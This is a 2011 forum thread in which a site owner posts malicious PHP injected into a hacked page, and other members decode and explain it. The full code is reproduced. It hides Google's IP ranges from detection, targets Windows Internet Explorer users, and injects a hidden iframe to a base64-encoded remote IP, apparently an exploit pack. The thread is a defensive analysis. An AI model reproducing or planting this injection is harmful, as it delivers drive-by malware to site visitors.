1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Site got hacked - can anyone decipher this?

Discussion in 'Black Hat SEO' started by Jared255, Jun 17, 2011.

  1. Jared255

    Jared255 Jr. Executive VIP Jr. VIP Premium Member

    Joined:
    May 10, 2009
    Messages:
    1,907
    Likes Received:
    1,663
    Location:
    Boston, MA
    Site is standard HTML/CSS, found this at the bottom of the page under the </html> tag. Anyone?

    Code:
    <?
    
    function net_match ( $network , $ip ) {
    $ip_arr = explode ( '/' , $network );
    $network_long = ip2long ( $ip_arr [ 0 ]);
    $x = ip2long ( $ip_arr [ 1 ]);
    $mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
    $ip_long = ip2long ( $ip );
    return ( $ip_long & $mask ) == ( $network_long & $mask );
    }
    
    function net()
    {
    $ip=$_SERVER['REMOTE_ADDR'];
    
    if(
    net_match('64.233.160.0/19',$ip)==0 &&
    net_match('66.102.0.0/20',$ip)==0 &&
    net_match('66.249.64.0/19',$ip)==0 &&
    net_match('72.14.192.0/18',$ip)==0 &&
    net_match('74.125.0.0/16',$ip)==0 &&
    net_match('89.207.224.0/24',$ip)==0 &&
    net_match('193.142.125.0/24',$ip)==0 &&
    net_match('194.110.194.0/24',$ip)==0 &&
    net_match('209.85.128.0/17',$ip)==0 &&
    net_match('216.239.32.0/19',$ip)==0 &&
    net_match('128.111.0.0/16',$ip)==0 &&
    net_match('67.217.0.0/16',$ip)==0 &&
    net_match('188.93.0.0/16',$ip)==0
    )
    return true;
    }
    
    function detect_os() {
    global $os;
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    if(strpos($user_agent, "Windows") !== false) $os = 'windows';
    }detect_os();
    
    
    function detect_brows() {
    global $OOOOO0000, $OOOOOO000;
    $user_agent = $_SERVER["HTTP_USER_AGENT"];
    if (preg_match("/MSIE 6.0/", $user_agent) OR
        preg_match("/MSIE 7.0/", $user_agent) OR
        preg_match("/MSIE 8.0/", $user_agent)
    ) $OOOOOO000 = "MSIE";
    }detect_brows();
    
    $IP = $_SERVER['REMOTE_ADDR'].".log";
    
    function _log()
    { global $IP;
    touch ("/tmp/angry/{$IP}");
    }
    @mkdir('/tmp/angry/');
    function _check()
    {
    global $IP;
    if(!file_exists("/tmp/angry/{$IP}")) return true;
    }
    $dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuNDcuMTcxL0hvbWUvaW5kZXgucGhw');
    if(_check())
    {
    if(net())
    {
    if($os)
    {
    if($OOOOOO000 == "MSIE")
    {
    echo '<iframe frameborder=0 src="'.$dfjgkbl.'" width=1 height=1 scrolling=no></iframe>';
    
    _log();
    
    }}}}
    Thanks,

    Jared
     
  2. mirrorer

    mirrorer Jr. VIP Jr. VIP

    Joined:
    Jan 30, 2009
    Messages:
    1,164
    Likes Received:
    1,029
    Just remove it dude or re-upload the original HTML/css file
     
  3. thxflash

    thxflash Power Member

    Joined:
    Jan 20, 2009
    Messages:
    786
    Likes Received:
    131
    Location:
    Newport Beach, CA
    Home Page:
    The base64 code is this "http://129.121.47.171/Home/index.php" = $dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuNDcuMTcxL0hvbWUvaW5kZXgucGhw');

    ;)

    Hope that helps!
     
    Last edited: Jun 17, 2011
  4. davids355

    davids355 Jr. VIP Jr. VIP Premium Member

    Joined:
    Apr 25, 2011
    Messages:
    8,789
    Likes Received:
    6,326
    Home Page:
    Yes forget about deciphering it, remove the code and track down the hole that let it in to start with - and make sure it doesn't happen again!
     
  5. JesusBack

    JesusBack Executive VIP Premium Member

    Joined:
    Sep 15, 2010
    Messages:
    1,159
    Likes Received:
    1,284
    Occupation:
    Almost done :D
    Location:
    {calm|cool|collected}
    basically someone is iframing another one of their own sites for some reason and blocking off a few IP's from it showing (yours?) and only making it show on windows+ie (browser virus?).

    And the fact that they're using an IP as their site means you don't really have a way to shut them down (so yeah, it's probably some malware being installed to all your windows+ie users).
     
    • Thanks Thanks x 1
    Last edited: Jun 17, 2011
  6. r00tk3y

    r00tk3y BANNED BANNED

    Joined:
    Apr 5, 2011
    Messages:
    225
    Likes Received:
    19
    Could be iframed to a java driveby website.
     
  7. maximviper

    maximviper BANNED BANNED

    Joined:
    Oct 25, 2010
    Messages:
    338
    Likes Received:
    86
    same thing happened with my sites. also i found millions of html pages of about size 350mb were uploaded to my hosting. i never understood the reasonn for them
     
  8. Hostwinds

    Hostwinds Power Member UnGagged Attendee Enterprise Member

    Joined:
    May 17, 2010
    Messages:
    768
    Likes Received:
    544
    Occupation:
    C.E.O.
    Location:
    Oklahoma
    Home Page:

    I wonder why they are blocking these huge IP ranges.......maybe government IP's???, I mean who has a /16 honestly??
     
  9. bezopravin

    bezopravin BANNED BANNED

    Joined:
    May 11, 2010
    Messages:
    461
    Likes Received:
    3,471
    Those are all the IPs of Google.

    Edit :

    From what am seeing when someone visits your site, the script checks whether the visitor is a google bot. If not, it checks the OS. If its windows, the script then continues execution and checks the browser. If its IE, then it checks its log whether the visitor already visited your site. If yes, it opens this url in iFrame. http: //129.121.47.171/Home/index.php. If not, It creates a folder inside temp directory /tmp/angry/. The name of the created folder will be the visitors IP address.


    You can see all the sites affected by this Virus http://www.google.com/search?q=inurl:/tmp/angry/&hl=en&safe=off&client=firefox-a&hs=W6M&rls=org.mozilla:en-GB:official&prmd=ivns&ei=4cr7TcKqCcXnrAeI8e3YDw&start=0&sa=N&biw=1442&bih=722

    The creator of this virus don't want your site to be marked as infected site by google. You can see This site may harm your computer. http://www.google.com/support/bin/answer.py?answer=45449&topic=360&hl=en&?sa=X&ei=wc77TabgAsPRrQeYpsjkDw&ved=0CEIQ2gEwBg
    under the results on the above link. Thats why he blocked all Google IPs. Pretty Clever!
     
    • Thanks Thanks x 1
    Last edited: Jun 17, 2011
  10. Hostwinds

    Hostwinds Power Member UnGagged Attendee Enterprise Member

    Joined:
    May 17, 2010
    Messages:
    768
    Likes Received:
    544
    Occupation:
    C.E.O.
    Location:
    Oklahoma
    Home Page:
    That is insane there are 65,536 IP's in a /16......

    Your 100% right though, Rwhois doesnt lie
     
  11. pheezy9

    pheezy9 Newbie

    Joined:
    Jul 25, 2011
    Messages:
    1
    Likes Received:
    0
    My site got hacked with the same exact code. Will you kind enough to tell me a little about your experience with it? I keep removing the code but the malicious code keeps getting added to the same file and other files =/
     
  12. eskimo

    eskimo Regular Member

    Joined:
    Dec 1, 2008
    Messages:
    474
    Likes Received:
    178
    the script is creating an iframe (except to a bunch of IP's, for them it doesnt show)
    the iframe points to
    Code:
    http://129.121.47.171/
    which is
    Code:
    http://www.callingcards.com
     
  13. jon_xx_x

    jon_xx_x Jr. VIP Jr. VIP

    Joined:
    Nov 15, 2008
    Messages:
    3,108
    Likes Received:
    1,458
    Was gonna guess Google.

     
  14. altschule

    altschule Regular Member

    Joined:
    Sep 1, 2010
    Messages:
    282
    Likes Received:
    185
    Location:
    Sector 9
    Also...
    Code:
    http://koreacallingcards.com/
    whois shows a name, address, phone, and fax.
     
  15. itslookingback

    itslookingback Newbie

    Joined:
    Apr 11, 2011
    Messages:
    14
    Likes Received:
    0
    iframe leading to exploit pack.
     
  16. Drink More Tea

    Drink More Tea Regular Member

    Joined:
    Apr 15, 2011
    Messages:
    208
    Likes Received:
    166
    If you got hacked it's 99% probability that it was either via insecure passwords, or an insecure installation of some software on the server upon which your site resides.